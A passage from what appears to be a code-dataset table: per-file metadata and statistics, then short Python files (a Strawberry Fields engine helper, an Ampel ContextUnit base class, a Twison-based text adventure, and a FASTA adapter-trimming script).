Helper function for creating an engine and associated quantum register.
Args:
num_subsystems (int): number of subsystems in the quantum register
Keyword Args:
hbar (float): The value of :math:`\hbar` to initialise the engine with, depending on the
conventions followed. By default, :math:`\hbar=2`. See
:ref:`conventions` for more details.
Returns:
(strawberryFields.engine.Engine, tuple[RegRef]): tuple containing (i) a Strawberry Fields Engine object, and (ii) a tuple of quantum register references
"""
eng = _Engine(num_subsystems, **kwargs)
return eng, eng.register
| 28.778947 | 160 | 0.715069 | 333 | 2,734 | 5.792793 | 0.489489 | 0.078797 | 0.069984 | 0.054432 | 0.066874 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005261 | 0.165691 | 2,734 | 94 | 161 | 29.085106 | 0.840421 | 0.830285 | 0 | 0 | 0 | 0 | 0.053191 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
7ca3d3280d06987764414ef8300e67a4da890263 | 861 | py | Python | ampel/core/ContextUnit.py | mafn/Ampel-core | 744acbf36f0a2ceae7230ceab1350236c1501b57 | [
"BSD-3-Clause"
] | null | null | null | ampel/core/ContextUnit.py | mafn/Ampel-core | 744acbf36f0a2ceae7230ceab1350236c1501b57 | [
"BSD-3-Clause"
] | null | null | null | ampel/core/ContextUnit.py | mafn/Ampel-core | 744acbf36f0a2ceae7230ceab1350236c1501b57 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: Ampel-core/ampel/core/ContextUnit.py
# License: BSD-3-Clause
# Author: valery brinnel <firstname.lastname@gmail.com>
# Date: 07.10.2019
# Last Modified Date: 09.01.2022
# Last Modified By: valery brinnel <firstname.lastname@gmail.com>
from ampel.types import Traceless
from ampel.base.AmpelUnit import AmpelUnit
from ampel.core.AmpelContext import AmpelContext
class ContextUnit(AmpelUnit):
"""
Base class for units requiring a reference to an AmpelContext instance
"""
context: Traceless[AmpelContext]
#: Private variable potentially set by UnitLoader for provenance purposes. Either:
#: * None if provanance flag is False
#: * 0 in case model content is not serializable
#: * any other signed int value
_trace_id: None | int = None
| 31.888889 | 83 | 0.70151 | 112 | 861 | 5.375 | 0.696429 | 0.044851 | 0.07309 | 0.099668 | 0.126246 | 0.126246 | 0 | 0 | 0 | 0 | 0 | 0.027778 | 0.205575 | 861 | 26 | 84 | 33.115385 | 0.852339 | 0.69338 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
7cc6fd7a3c9e41f47e69e6f25b261625ab240b86 | 2,025 | py | Python | main.py | Dudewhothings/01-Interactive-Fiction | cb4b4ae983c100c7524d5d455a5919b1c9aff0ba | [
"MIT"
] | null | null | null | main.py | Dudewhothings/01-Interactive-Fiction | cb4b4ae983c100c7524d5d455a5919b1c9aff0ba | [
"MIT"
] | null | null | null | main.py | Dudewhothings/01-Interactive-Fiction | cb4b4ae983c100c7524d5d455a5919b1c9aff0ba | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import sys,os,json,re
assert sys.version_info >= (3,9), "This script requires at least Python 3.9"
def load(l):
f = open(os.path.join(sys.path[0], l))
data = f.read()
j = json.loads(data)
return j
def find_passage(game_desc, pid):
for p in game_desc["passages"]:
if p["pid"] == pid:
return p
return {}
# Removes Harlowe formatting from Twison description
def format_passage(description):
description = re.sub(r'//([^/]*)//',r'\1',description)
description = re.sub(r"''([^']*)''",r'\1',description)
description = re.sub(r'~~([^~]*)~~',r'\1',description)
description = re.sub(r'\*\*([^\*]*)\*\*',r'\1',description)
description = re.sub(r'\*([^\*]*)\*',r'\1',description)
description = re.sub(r'\^\^([^\^]*)\^\^',r'\1',description)
description = re.sub(r'(\[\[[^\|]*?)\|([^\]]*?\]\])',r'\1->\2',description)
description = re.sub(r'\[\[([^(->\])]*?)->[^\]]*?\]\]',r'[ \1 ]',description)
description = re.sub(r'\[\[(.+?)\]\]',r'[ \1 ]',description)
return description
def update(current,choice,game_desc):
if choice == "":
return current
for l in current["links"]:
if l["name"] == choice:
current = find_passage(game_desc, l["pid"])
return current
print("I don't understand. Please try again!")
return current
def render(current):
print("\n\n")
print(current["name"])
print(format_passage(current["text"]))
print("\n")
def get_input(current):
choice = input("What would you like to do? (Type quit to exit) ")
#choice = choice.lower().strip()
return choice
def main():
game_desc = load("RuinedCity.json")
current = find_passage(game_desc, game_desc["startnode"])
choice = ""
while choice != "quit" and current != {}:
current = update(current,choice,game_desc)
render(current)
choice = get_input(current)
print("Thanks for Playing!")
if __name__ == "__main__":
main()
| 28.125 | 81 | 0.570864 | 256 | 2,025 | 4.421875 | 0.351563 | 0.174912 | 0.190813 | 0.214664 | 0.341873 | 0.248233 | 0.248233 | 0.248233 | 0.248233 | 0.248233 | 0 | 0.009956 | 0.20642 | 2,025 | 71 | 82 | 28.521127 | 0.694462 | 0.050864 | 0 | 0.058824 | 0 | 0 | 0.205315 | 0.030224 | 0 | 0 | 0 | 0 | 0.019608 | 1 | 0.137255 | false | 0.117647 | 0.019608 | 0 | 0.313725 | 0.117647 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
7ccadba15c0cd0d09be22d2e4f9a1198c946cf18 | 1,878 | py | Python | etc/manualTrimming.py | Tiago-Minuzzi/lab-stuff | b4cbca8c578e3cc4035df5686254d9254a876413 | [
"MIT"
] | null | null | null | etc/manualTrimming.py | Tiago-Minuzzi/lab-stuff | b4cbca8c578e3cc4035df5686254d9254a876413 | [
"MIT"
] | null | null | null | etc/manualTrimming.py | Tiago-Minuzzi/lab-stuff | b4cbca8c578e3cc4035df5686254d9254a876413 | [
"MIT"
] | null | null | null | import sys
# Input file
seqri=sys.argv[1]
# List of adapters
adapters = [
"cactctttccctacacgacgtcttccgatctaattctggaccatagtgcaatgt",
"cactctttccctacacgacgctcttccgacctcattcccaccctcttccg",
"cactctttccctacacgacgctcttccgatttcattcttcccc",
"cactctttccctacacgcgctcttccgatctaattcggcgg",
"cactctttccctacacgacgctcttccggatctaattca",
"cactctttccctacacgcgctcttccgatctaattcgg",
"cactctttccctacacgacgctcttccggatctagctt",
"cactctttccctacacgacgctcttccggatctaattc",
"cactctttccctacacgacgctcttccgattttatttc",
"cactctttccctacacgacgctcttccgacctcattcc",
"cactctttccctacacgacgctcttccgaatctaatta",
"cactctttccctacacgcgctcttccgatctaattcg",
"cactctttccctacacgacgctcttccggatctaatt",
"cactctttccctacacgacgctcttccgatttcattc",
"cactctttccctacacgacgctcttccgaatctaatt",
"cactctttccctacacgacgctttccgatctaattc",
"cactctttccctacacgacgctcttccgatttagct",
"cactctttccctacacgacgctcttccgatccaatt",
"cactctttccctacacgacgctcttccgaatctagc",
"cactctttccctacacgcgctcttccgatctagct",
"cactctttccctacacgacgctcttccgatttagc",
"cactctttccctacacgacgctcttccgaatctag",
"cactctttccctacacgacgctcttccggttcta",
"cactctttccctacacgacgctcttccggatcta",
"cactctttccctacacgacgctcttccgaatcta",
"cactctttccctaccgacgctcttccgatcta",
"cactctttccctacacgcgctcttccgatcta",
"cactctttccctacacgacgctttccgatcta",
"cactctttccctacacgacgctcttccgatc",
"cactctttccctacacgacgctcttccg",
"cactctttccctacacgacg"
]
# Create list to store ids and sequences
ids=[]
seqs=[]
# Sequences in input fasta must be linearized
with open(seqri, 'r+') as fasta:
for line in fasta.readlines():
if line.startswith('>'):
ids.append(line.strip())
else:
seqs.append(line.strip())
conj=zip(ids,seqs)
# Remove adapters
for valor in conj:
pv=valor[0]
nv=valor[1]
for adapter in adapters:
if adapter in valor[1]:
nv=nv.replace(adapter,"")
else:
nv=nv
print(pv+"\n"+nv)
| 31.3 | 57 | 0.793397 | 118 | 1,878 | 12.627119 | 0.644068 | 0.009396 | 0.020134 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002407 | 0.115016 | 1,878 | 59 | 58 | 31.830508 | 0.894103 | 0.067093 | 0 | 0.037736 | 0 | 0 | 0.649485 | 0.635166 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.018868 | 0 | 0.018868 | 0.018868 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.